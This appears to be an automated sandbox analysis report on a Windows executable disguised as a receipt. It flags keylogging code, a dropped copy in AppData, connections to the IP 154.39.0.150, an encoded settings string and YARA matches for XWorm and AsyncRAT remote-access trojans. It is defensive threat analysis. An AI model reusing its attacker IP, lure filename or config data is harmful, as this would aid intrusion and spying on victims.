            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: Receipt-#202431029B.exe, 00000000.00000002.1669926241.0000000002521000.00000004.00000800.00020000.00000000.sdmp, Receipt-#202431029B.exe, 00000008.00000002.4102389943.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, XetHVID.exe, 00000009.00000002.1724608978.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Contains functionality to log keystrokes (.Net Source)
            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
            Source: 9.2.XetHVID.exe.2b8fa44.1.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
            Source: 9.2.XetHVID.exe.2b7c8f4.0.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 9.2.XetHVID.exe.2b7c8f4.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 9.2.XetHVID.exe.2b7c8f4.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 9.2.XetHVID.exe.2b7c8f4.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 9.2.XetHVID.exe.2b7c8f4.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.Receipt-#202431029B.exe.256e6f0.1.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.Receipt-#202431029B.exe.256e6f0.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 9.2.XetHVID.exe.2b8fa44.1.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 9.2.XetHVID.exe.2b8fa44.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 13.2.XetHVID.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 13.2.XetHVID.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 9.2.XetHVID.exe.2b8fa44.1.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 9.2.XetHVID.exe.2b8fa44.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.Receipt-#202431029B.exe.256e6f0.1.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.Receipt-#202431029B.exe.256e6f0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0000000D.00000002.1750667088.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000009.00000002.1724608978.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000009.00000002.1724608978.0000000002B88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.1669926241.0000000002521000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: Receipt-#202431029B.exe
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeCode function: 0_2_00A23E340_2_00A23E34
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeCode function: 0_2_00A2E1240_2_00A2E124
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeCode function: 0_2_00A26F900_2_00A26F90
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeCode function: 0_2_05726BB00_2_05726BB0
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeCode function: 0_2_05726BA20_2_05726BA2
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeCode function: 0_2_0757A16F0_2_0757A16F
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeCode function: 0_2_075700400_2_07570040
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeCode function: 0_2_07572D300_2_07572D30
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeCode function: 0_2_075755F80_2_075755F8
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeCode function: 0_2_075735A00_2_075735A0
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeCode function: 0_2_07574C480_2_07574C48
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeCode function: 0_2_07574C370_2_07574C37
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeCode function: 0_2_075731680_2_07573168
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeCode function: 0_2_0757001D0_2_0757001D
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeCode function: 0_2_08B341170_2_08B34117
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeCode function: 0_2_08B312400_2_08B31240
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeCode function: 0_2_08B336680_2_08B33668
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeCode function: 0_2_08B36D080_2_08B36D08
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeCode function: 0_2_08B312300_2_08B31230
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeCode function: 8_2_013945388_2_01394538
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeCode function: 8_2_013913608_2_01391360
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeCode function: 8_2_01393F408_2_01393F40
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeCode function: 8_2_01391A0A8_2_01391A0A
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeCode function: 8_2_0537E7488_2_0537E748
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeCode function: 8_2_053746648_2_05374664
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeCode function: 8_2_0537B6F08_2_0537B6F0
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeCode function: 8_2_0537DAB88_2_0537DAB8
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeCode function: 8_2_0537A6B08_2_0537A6B0
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeCode function: 8_2_05371E7C8_2_05371E7C
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeCode function: 8_2_05376B108_2_05376B10
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeCode function: 8_2_07505F918_2_07505F91
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeCode function: 8_2_07503E088_2_07503E08
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeCode function: 8_2_075035388_2_07503538
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeCode function: 8_2_075031F08_2_075031F0
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeCode function: 8_2_0750159C8_2_0750159C
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeCode function: 8_2_07507C808_2_07507C80
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeCode function: 9_2_01353E349_2_01353E34
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeCode function: 9_2_0135E1249_2_0135E124
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeCode function: 9_2_01356F909_2_01356F90
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeCode function: 9_2_056301209_2_05630120
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeCode function: 9_2_056301309_2_05630130
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeCode function: 9_2_076595E09_2_076595E0
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeCode function: 9_2_076500409_2_07650040
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeCode function: 9_2_076522119_2_07652211
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeCode function: 9_2_076531689_2_07653168
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeCode function: 9_2_07652D309_2_07652D30
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeCode function: 9_2_076555F89_2_076555F8
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeCode function: 9_2_076535929_2_07653592
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeCode function: 9_2_07654C489_2_07654C48
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeCode function: 9_2_07654C379_2_07654C37
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeCode function: 9_2_076500069_2_07650006
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeCode function: 9_2_08CF12409_2_08CF1240
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeCode function: 9_2_08CF36689_2_08CF3668
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeCode function: 9_2_08CF6D089_2_08CF6D08
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeCode function: 9_2_08CF12309_2_08CF1230
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeCode function: 9_2_056376A89_2_056376A8
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeCode function: 9_2_056376999_2_05637699
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeCode function: 13_2_02A0136013_2_02A01360
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeCode function: 13_2_02A01A0A13_2_02A01A0A
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8004 -s 2132
            Source: Receipt-#202431029B.exe, 00000000.00000002.1669926241.0000000002521000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemrchris1.exe4 vs Receipt-#202431029B.exe
            Source: Receipt-#202431029B.exe, 00000000.00000002.1672270857.0000000003521000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Receipt-#202431029B.exe
            Source: Receipt-#202431029B.exe, 00000000.00000002.1692900042.0000000008A9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRVYv.exeJ vs Receipt-#202431029B.exe
            Source: Receipt-#202431029B.exe, 00000000.00000002.1690476682.00000000072B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Receipt-#202431029B.exe
            Source: Receipt-#202431029B.exe, 00000000.00000002.1668785321.000000000062E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Receipt-#202431029B.exe
            Source: Receipt-#202431029B.exe, 00000000.00000002.1691082517.00000000074E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Receipt-#202431029B.exe
            Source: Receipt-#202431029B.exe, 00000000.00000002.1672270857.0000000003569000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Receipt-#202431029B.exe
            Source: Receipt-#202431029B.exe, 00000000.00000002.1672270857.0000000003569000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Receipt-#202431029B.exe
            Source: Receipt-#202431029B.exe, 00000008.00000002.4106209382.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRVYv.exeJ vs Receipt-#202431029B.exe
            Source: Receipt-#202431029B.exe, 00000008.00000002.4107351015.0000000005CE9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Receipt-#202431029B.exe
            Source: Receipt-#202431029B.exeBinary or memory string: OriginalFilenameRVYv.exeJ vs Receipt-#202431029B.exe
            Source: Receipt-#202431029B.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 9.2.XetHVID.exe.2b7c8f4.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 9.2.XetHVID.exe.2b7c8f4.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 9.2.XetHVID.exe.2b7c8f4.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 9.2.XetHVID.exe.2b7c8f4.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.Receipt-#202431029B.exe.256e6f0.1.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.Receipt-#202431029B.exe.256e6f0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 9.2.XetHVID.exe.2b8fa44.1.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 9.2.XetHVID.exe.2b8fa44.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 13.2.XetHVID.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 13.2.XetHVID.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 9.2.XetHVID.exe.2b8fa44.1.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 9.2.XetHVID.exe.2b8fa44.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.Receipt-#202431029B.exe.256e6f0.1.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.Receipt-#202431029B.exe.256e6f0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0000000D.00000002.1750667088.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000009.00000002.1724608978.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000009.00000002.1724608978.0000000002B88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.1669926241.0000000002521000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: Receipt-#202431029B.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: XetHVID.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Notepab.exe.8.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: 9.2.XetHVID.exe.2b8fa44.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 9.2.XetHVID.exe.2b8fa44.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 9.2.XetHVID.exe.2b8fa44.1.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: 9.2.XetHVID.exe.2b7c8f4.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 9.2.XetHVID.exe.2b7c8f4.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 9.2.XetHVID.exe.2b7c8f4.0.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.raw.unpack, Settings.csBase64 encoded string: 'I25u4Juh2DKE/jJyAWIea36tg/hnu/Tyj4tt928ScW4CIvErIBiBkgjSKe9V+MTH'
            Source: 9.2.XetHVID.exe.2b8fa44.1.raw.unpack, Settings.csBase64 encoded string: 'I25u4Juh2DKE/jJyAWIea36tg/hnu/Tyj4tt928ScW4CIvErIBiBkgjSKe9V+MTH'
            Source: 9.2.XetHVID.exe.2b7c8f4.0.raw.unpack, Settings.csBase64 encoded string: 'I25u4Juh2DKE/jJyAWIea36tg/hnu/Tyj4tt928ScW4CIvErIBiBkgjSKe9V+MTH'
            Source: 9.2.XetHVID.exe.2b7c8f4.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 9.2.XetHVID.exe.2b7c8f4.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, MKwas8PYpZOx8H3OeB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, MKwas8PYpZOx8H3OeB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, BEe5fardcVsVhoTVde.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, BEe5fardcVsVhoTVde.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, BEe5fardcVsVhoTVde.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, BEe5fardcVsVhoTVde.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, BEe5fardcVsVhoTVde.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, BEe5fardcVsVhoTVde.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, BEe5fardcVsVhoTVde.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, BEe5fardcVsVhoTVde.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, BEe5fardcVsVhoTVde.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, MKwas8PYpZOx8H3OeB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 9.2.XetHVID.exe.2b8fa44.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 9.2.XetHVID.exe.2b8fa44.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@20/21@0/1
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile created: C:\Users\user\AppData\Roaming\XetHVID.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeMutant created: NULL
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8004
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1744:120:WilError_03
